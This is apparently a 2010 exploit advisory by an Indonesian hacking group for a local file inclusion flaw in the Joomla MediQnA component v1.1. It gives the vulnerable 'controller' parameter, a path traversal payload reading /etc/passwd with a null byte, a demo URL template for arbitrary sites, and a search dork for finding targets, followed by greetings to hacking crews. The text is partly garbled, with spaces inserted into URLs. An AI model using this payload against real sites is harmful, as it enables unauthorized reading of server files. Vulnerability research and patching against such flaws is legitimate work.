Test method:
The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! [!] ========================================================== ========================================== [!]
[~] Joomla Component MediQnA LFI vulnerability
[~] Author: kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage: http://www.indonesiancoder.com
[~] Date: 27, May, 2010
[~] Location: Indonesia
[!] ========================================================== ========================================== [!]
[Software Information]
[+] Vendor: http://www.FamousWebsites.biz/
[+] More Info: http://www.famouswebsites.biz/JED/Medi-QnA/Medi-QnA.php
[+] Price: free
[+] Vulnerability: LFI
[+] Dork: inurl: "CIHUY ";)
[+] Download: http://www.famouswebsites.biz/JED/Medi-QnA/com_mediqna.zip
[+] Version: v1.1
[!] ========================================================== ========================================== [!]
[+] [Live From Jogja] [+]
[Vulnerable File]
Http: // 127.0.0.1/index. php? Option = com_mediqna & controller = [INDONESIANCODER]
[XpL]
.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Etc/passwd % 00
[D3m0]
Http: // [site]/index. php? Option = com_mediqna & controller = .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd % 00
Etc;]
[!] ========================================================== ========================================== [!]
[Thx TO]
[+] Indonesian coder team MainHack ServerIsDown SurabayaHackerLink IndonesianHacker Co., MC-CREW. ARUMBIA TEAM
[+] Tukulesto, M3NW5, arianom, N4CK0, Jundab, d0ntcry, bobyhikaru, gonzhack, senot, heart_attack
[+] Contrex, YadoY666, yasea, bugs, Ronz, Pathloader, cimpli, MarahMerah. IBL13Z, r3m1ck
[+] Coracore, Gh4mb4s, Jack-, VycOd, m0rgue, otong, CS-31, yur4kh4, MISTERFRIBO, pL4nkt0n
[NOTE]
[+] We are one unity, we are a coder family, AND WE ARE INDONESIAN CODER TEAM
[+] Jika kami bersama Nyalakan Tanda Bahaya ;)
[+] Ajep
[+] R3m1ck: makasi di bolehin bubu di kost nya... kwkwkwkwk
[QUOTE]
[+] INDONESIANCODER still r0x
[+] Nothing secure ..